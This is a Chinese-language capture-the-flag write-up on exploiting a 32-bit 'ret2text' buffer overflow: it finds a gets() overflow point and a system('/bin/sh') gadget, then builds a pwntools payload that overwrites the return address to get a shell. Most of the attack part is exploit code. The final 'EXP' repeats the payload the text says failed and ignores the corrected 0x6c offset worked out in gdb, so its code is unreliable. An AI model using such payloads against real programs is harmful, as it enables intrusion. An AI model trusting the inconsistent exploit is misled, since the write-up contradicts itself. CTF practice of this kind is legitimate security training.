1.检查保护机制
(1)开启堆栈不可执行保护
(2)该文件是32位文件
2.用32位IDA打开该文件
(1)先运行试试看
(2)shift+f12查看关键字符串
我们看到有system("/bin/sh")关键字符串
(3)进入main函数看看
看到gets()函数我们就看到溢出点了。S:0x64
我们构造payload
#encoding = utf-8
from pwn import*
context(os = 'linux',arch = 'i386',log_level = 'debug')
content = 1
def main():
if content == 1:
p = process('ret2text')
binsh_addr = 0x0804863A
payload = b'a' *(0x64+0x4) + p32(binsh_addr)
p.recvuntil("There is something amazing here, do you know anything?\n")
p.sendline(payload)
p.interactive()
main()
我们发现没有拿到shell权限
(4)我们gdb调试查找s的位置,计算偏移
找到s跳转位置0x080486AE
gdb调试给call下断点
然后运行
s位置在0xffffd0ec
s相对于ebp的偏移量为:ebp-s=0xffffd158-0xffffd0ec=0x6c
s相对于返回地址的偏移量为:0x6c+0x4
3.EXP
#encoding = utf-8
from pwn import*
context(os = 'linux',arch = 'i386',log_level = 'debug')
content = 1
def main():
if content == 1:
p = process('ret2text')
binsh_addr = 0x0804863A
payload = b'a' *(0x64+0x4) + p32(binsh_addr)
p.recvuntil("There is something amazing here, do you know anything?\n")
p.sendline(payload)
p.interactive()
main()